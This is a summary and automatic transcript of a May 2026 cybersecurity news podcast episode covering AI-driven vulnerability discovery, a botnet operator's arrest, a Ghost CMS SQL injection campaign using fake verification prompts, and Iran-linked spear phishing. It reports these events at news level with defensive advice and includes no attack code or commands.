Summary5 min read

Cybersecurity Today – Episode Summary

Episode Title: AI Vulnerability Explosion, Kim Wolf Botnet Arrest, Ghost CMS Hack, Iran Cyber Espionage
Host: David Shipley
Date: May 25, 2026

Episode Overview

In this episode, David Shipley delivers a fast-paced, incisive briefing on four major cybersecurity stories dominating headlines: the unprecedented rise in discovered software vulnerabilities powered by AI, the dramatic arrest of an alleged major DDoS botnet operator in Canada, mass exploitation of a critical Ghost CMS flaw affecting high-profile institutions, and a surgically targeted Iranian cyber-espionage operation against defense and telecom companies. The episode blends hard numbers, technical specifics, and actionable advice for defenders as the threat landscape intensifies.

Key Discussion Points and Insights

1. AI-Powered Vulnerability Discovery ("Vunpocalypse")

[00:20–05:30]

Anthropic's Project Glasswing Update: Anthropic’s AI vulnerability discovery project has surfaced over 10,000 candidate flaws within a single month—6,000+ labeled high or critical across 1,000+ open source projects.
Human Review Still Essential: Of 6,202 high/critical findings, only 1,726 were validated as true vulnerabilities—a true positive rate of about 28%.
Resource Considerations: Generating findings (whether true or false) may cost up to $500/minute in tokens.
Real-World Impact: The critical CVE-2026-5194 in WolfSSL (CVSS 9.1) could allow attackers to forge certificates and impersonate services in IoT and embedded systems.
Acceleration of Patch Cycles: Anthropic urges organizations to "shorten patch cycles and deploy security fixes faster," warning the volume of discoveries is accelerating. Microsoft and Oracle’s patching schedules are adapting to this.

“The same models that find bugs for defenders will find them for attackers.”—David Shipley [03:55]

Unknown Costs: The scale and expense of triaging false positives remains unclear for organizations.
Industry Response: Vendors’ ability to keep up with the rising patch volume is questioned.

2. Arrest of Kim Wolf Botnet Mastermind in Canada

[05:30–12:10]

Overview: 23-year-old Jacob Butler (alias “Dort”) arrested in Ottawa, accused of operating Kim Wolf, one of the largest IoT botnets ever measured. Facing extradition to the United States.
Botnet Scale: Linked to DDoS attacks peaking at almost 30 Tbps, with over 25,000 attacks and victim losses exceeding $1 million in some cases. High-value targets included US Department of Defense address ranges.
Operational Details & Unmasking: KrebsOnSecurity identified Butler through email, forum activity, and public social media; law enforcement corroborated via IP and transaction records.
Retaliatory Attacks: After being unmasked, Butler allegedly swatted researchers, including Brian Krebs and Ben Brundage.
International Law Enforcement Operation: The dismantling included Kim Wolf and three other major botnets, plus seizure of four dozen “DDoS-for-hire” service domains in April.
Legal Status: Butler remains in custody, with a hearing set for May 26th.

“The criminal complaint says Butler did very little to separate his real-life identity from his criminal online persona.” —David Shipley [08:19]

3. Ghost CMS Mass Exploitation (SQL Injection Flaw)

[12:10–17:30]

Widespread Compromise: A critical SQL injection vulnerability (CVE-2026-6980) in Ghost CMS led to mass exploitation affecting 700+ domains, including Harvard, Oxford, Auburn Universities, and DuckDuckGo.
Attack Chain: Attacker steals admin API keys via SQL injection, injects malicious JavaScript, and leverages a click fix social engineering method—tricking users into copying, then running, malware through the Windows command prompt.
Nature of the Social Engineering: The page masquerades as a Cloudflare verification prompt, a familiar sight most users trust and respond to without suspicion.
Attackers Competing: Two or more distinct threat actors appear to compete for access, sometimes erasing each other's scripts to install their own.
Advice for Defenders: Administrators must update to version 6.19.1 or later, rotate API keys, and assume exposure if they’ve run a vulnerable version.

“Click fix is a class of social engineering attack that’s exploded over the last year, with Microsoft noting 47% of initial access breaches were tied to this kind of attack.” —David Shipley [15:35]

4. Sophisticated Iran-Linked Spear Phishing Campaign

[17:30–22:00]

Targets: A campaign against aerospace, defense, and telecom companies in the US, Israel, UAE, and other Middle Eastern nations.
Threat Actor: Identified by Palo Alto Networks’ Unit 42 as “Screening Serpens” (a.k.a. UNC1549, Smoke Sandstorm, Nimbus Manticore).
Tactics: Deeply personalized spear phishing using fake job postings, spoofed Microsoft Teams invitations, and customized emails mimicking real companies.
Sophistication: What distinguishes this campaign is not the malware but “months of patient reconnaissance, deep social engineering, and surgical targeting” of high-value individuals.
Dual Attacker Model: Contrasts recent mass, opportunistic hacks (like tank gauge system compromises) with these high-investment, targeted operations—different tiers from the same threat ecosystem.
Warning and Mitigation: Organizations in targeted sectors should adjust their threat models and expect further attempts.

“The same adversary is operating at two very different tiers simultaneously.”—David Shipley [21:00]

Notable Quotes & Memorable Moments

“Of the 6,202 high or critical severity findings, only 1,726 have been confirmed as valid true positives after subsequent analysis. That’s a true positive rate of about 28%.” —David Shipley [02:30]
“Kim Wolf was linked to DDoS attacks measuring nearly 30 terabits per second, which the Justice Department describes as a record.” —David Shipley [06:55]
“The botnet is alleged to have issued more than 25,000 attacks… some targets included Internet address ranges belonging to the US Department of Defense.” —David Shipley [07:17]
“The fake verification page instructs the visitor to copy a string of text and paste it into the Windows command prompt, supposedly to confirm they’re not a bot. The pasted command actually downloads and runs malware.” —David Shipley [15:55]
“Defenders in aerospace, defense and telecom should adjust their threat model accordingly.” —David Shipley [21:33]

Important Segment Timestamps

00:00–05:30: AI vulnerability surge, Anthropic's Project Glasswing, impact on patch cycles.
05:30–12:10: Kim Wolf botnet—arrest, scale, technical details, and law enforcement action.
12:10–17:30: Ghost CMS flaw—method of exploitation, targets, click fix attack, advice for admins.
17:30–22:00: Iran-linked spear phishing—tactics, targets, and lessons for defenders.

Conclusion

David Shipley’s report draws a picture of a cybersecurity landscape transformed by automation, machine intelligence, and global adversaries operating at both massive and surgical scales. The episode emphasizes the growing importance—and challenge—of response times, threat modeling, and adapting to new forms of technical and social exploitation. Listeners are left with clear, actionable takeaways in a time of rising risk and complexity.

Loading summary

Transcript1 lines

[00:00]
A
Early evidence of the software vulnerability apocalypse arrives Alleged Kim Wolf botmaster arrested in Ottawa, Canada Ghost CMS flaw hits Harvard and Oxford and Iran linked hackers runs Surgical spear phishing this is Cybersecurity Today and I'm your host David Shipley coming to you from Canada's capital. Let's get started. The early evidence of the rising vunpocalypse is in and the numbers tell a few interesting stories. Anthropic published an update on Friday on Project glasswing, the AI assisted vulnerability discovery initiative that the company first publicly described in April. Since the program went live last month, Anthropic says Claude Mythos has uncovered more than 10,000 candidate vulnerabilities and more than 6,000 of those are flagged as high or critical severity across more than 1,000 open source projects. That's the marketing angle and it's the one getting all the headlines. According to the Hacker News, the program currently runs with about 50 partner organizations who get exclusive early access to a non public model for called Claude Mythos Preview. The model is being used to autonomously scan widely used software and surface flaws before attackers can exploit them. But here's where things get more interesting. The raw discovery numbers come with critical Context of the 6,202 high or critical severity findings, only 1,726 have have been confirmed as valid true positives after subsequent analysis. That's a true positive rate of about 28%. And while that's impressive for a machine working autonomously at this scale, it's also a reminder that the headline 10,000 number includes a lot of false positives that human reviewers still need to triage of the true positives and 97 so far have been patched upstream and 88 security advisories have been issued. And it's worth noting we have no idea what the total cost was to generate the false positives as well as the true findings. We know from some researchers working with the tool that it may cost up to $500aminute in tokens. One of the confirmed findings is a critical flaw in Wolf SSL and an open source cryptography library used in embedded systems and Internet of Things devices. The Vulnerability tracked as CVE2026 5194 with a CVSS score of 9.1 could allow an attacker to forge digital certificates and masquerade as a legitimate service for listeners tracking AI in offensive and defensive security. It's been an interesting few months. First there was the original leak from Anthropic that Mythos was coming, and then the deluge of headlines in April proclaiming the end is near when it comes to software vulnerability discovery and the sheer volume potentially that this tool would discover. On May 13, we covered Google Threat Intelligence Group's report on the first AI developed zero day used in mass exploitation. The capability to use this tool cuts both defensively and offensively. The same models that find bugs for defenders will find them for attackers. Anthropic is urging organizations to shorten patch cycles and deploy security fixes faster because the volume of newly discovered vulnerabilities is rising and will continue to grow. Microsoft has already publicly said its monthly patch volume will continue trending larger. Oracle has recently shifted to a monthly patch cycle. It's unclear if the software maker's patch quality processes can scale effectively as the threat grows and if receiving organizations can even keep up with all the patches. And that's where the real story will be on the vanpocalypse Canadian and US Law enforcement have arrested the alleged operator of one of the largest DDoS botnets ever measured, and he's a 23 year old from Ottawa. According to Krebson Security. Jacob Butler, who went online by the alias Dort, was arrested in Ottawa on Wednesday by the Ontario Provincial police under a U.S. extradition warrant. He's been charged in both jurisdictions with operating Kimwolf and an Internet of Things botnet that enslaved millions of Internet connected devices and used them to launch some of the largest distributed denial of service attacks on record so far. The numbers are extraordinary. According to the US Department of Justice, Kim Wolf was linked to DDoS attacks measuring nearly 30 terabits per second, which the Justice Department describes as a record. The botnet is alleged to have issued more than 25,000 attacks. Victim losses exceeded $1 million in some cases, and some targets included Internet address ranges belonging to the US Department of Defense, which is why the Pentagon's Defense Criminal Investigative Service, together with the FBI field office in Anchorage, ended up running point on the US Side of the investigation in February of this year. Krebs on Security publicly identified Butler by working through his email addresses, his registrations on cybercrime forums, and his posts to public Telegram and Discord servers. Investigators later confirmed those connections through IP records, transaction records and message logs obtained through legal process. The criminal complaint says Butler did very little to separate his real life identity from his criminal online Persona. After Butler was unmasked, he allegedly directed retaliatory attacks against the researchers who helped identify him, including swatting the practice of placing fake emergency calls in an attempt to send armed police to a target's home. Two of the named swatting victims were the founder of Krebs on Security, Brian Krebs, and Ben Brundage, founder of the cybersecurity firm Syntheon. The arrest is also part of a broader international effort. On March 19, US and international law enforcement seized the technical infrastructure for Kimwolf and and three other large DDoS botnets, Aciru, Jakscid and Mossad that were all competing for the same pool of vulnerable IoT devices. In April, the Justice Department also seized domain names tied to roughly four dozen DDOs for hire services in a coordinated takedown. Butler remains in Canadian custody. He's scheduled for a hearing tomorrow, May 26th. None of the charges against him have been proven in a court of law. If extradited to the United States, he faces one count of aiding and abetting computer intrusion with a maximum sentence of 10 years. A large scale campaign is exploiting a critical SQL injection flaw in GO CMS to compromise hundreds of websites, including Harvard University, Oxford University, Auburn University and the privacy focused search engine DuckDuckGo, according to Bleeping Computer. The campaign has been documented by threat intelligence researchers at xlab, the security research arm of Chinese cybersecurity firm Chenxin. The researchers confirmed at least 700 affected domains. The victim list spans university portals, AI and SaaS companies, media outlets, fintech firms, security sites and personal blogs. The vulnerability is tracked as CVE 2000, 26, 26, 980. It affects Go CMS versions 3.24.0 through 6.19.0. The vulnerability allows an unauthenticated attacker to read arbitrary data from the website's database, including the admin API keys that grant management access over users, articles and themes. Ghost released a patch in February in version 6.19.1. Many sites didn't install it. Sentinel 1 flagged active exploitation a week later. Three months on, the exploitation is still going strong. Here's how the attack chain worked. The attackers exploit the SQL injection flaw to steal the site's admin keys. They then use those keys to inject malicious JavaScript into the site's articles. When a visitor lands on a compromised page, the JavaScript fingerprints the visitor and decides whether to serve them a payload. Visitors who qualify see what looks like a cloudflare verification prompt. The kind of prove you're a human page many people have become used to and have learned to click through without thinking too much about it. This is what's known as a click fix attack. Click fix is a class of social engineering attack that's exploded over the last year, with Microsoft noting 47% of initial access breaches were tied to this kind of attack. The fake verification page instructs the visitor to copy a string of text and paste it into the Windows command prompt, supposedly to confirm they're not a bot. The pasted command actually downloads and runs malware. Xlab and SentinelOne both observed at least two distinct threat actors operating in the same Go CMS victim pool, sometimes cleaning up each other's malicious scripts off a compromised site in order to inject their own. For GO CMS administrators, the action is straightforward. Update to version 6.19.1 or later, rotate all admin API keys and assume you were exposed if running a vulnerable version Iran linked government hackers are running a sophisticated spear phishing espionage campaign against aerospace, defense and telecommunications companies in the United States, Israel, the United Arab Emirates and at least two other Middle Eastern countries, according to cybersecurity dive researchers at Palo Alto Networks Unit 42 and have identified six new remote access Trojans deployed by an Iran linked group they're calling Screening serpens. The same group is tracked by other researchers under names including UNC 1549, Smoke Sandstorm and Nimbus Manticore. They've been operating since well before the war, but have been visibly stepping up their operations since the war began. What stands out about this campaign is not the malware, it's the targeting. The hackers are running deeply personalized spear phishing, fake job postings impersonating real aerospace companies, spoofed Microsoft Teams meeting invitations and customized recruitment emails sent through what looks like a legitimate employment website. The goal of each lure is to get the victim to execute the first stage of an infection chain themselves. Tehran link groups have also continued to orchestrate what Palo Alto describes as as sustained adaptive global cyber campaigns. The researchers warn organizations to expect further attempts in the near term. This story contrasts last week's report on Iran linked hackers compromising automatic tank gauge systems at U.S. gas stations. The gas station story was all about the opportunistic end of the spectrum unprotected IoT systems with low effort exploitation. This story shows the high end months of patient reconnaissance, deep social engineering and surgical targeting of high valued users in high valued sectors. The same adversary is operating at two very different tiers simultaneously. Defenders in aerospace, defense and telecom should adjust their threat model accordingly. That's Cybersecurity today for Monday, May 25, 2026. We appreciate all of your feedback. Feel free to leave a comment under the YouTube video or drop by technewsday.com or CA and send us a note.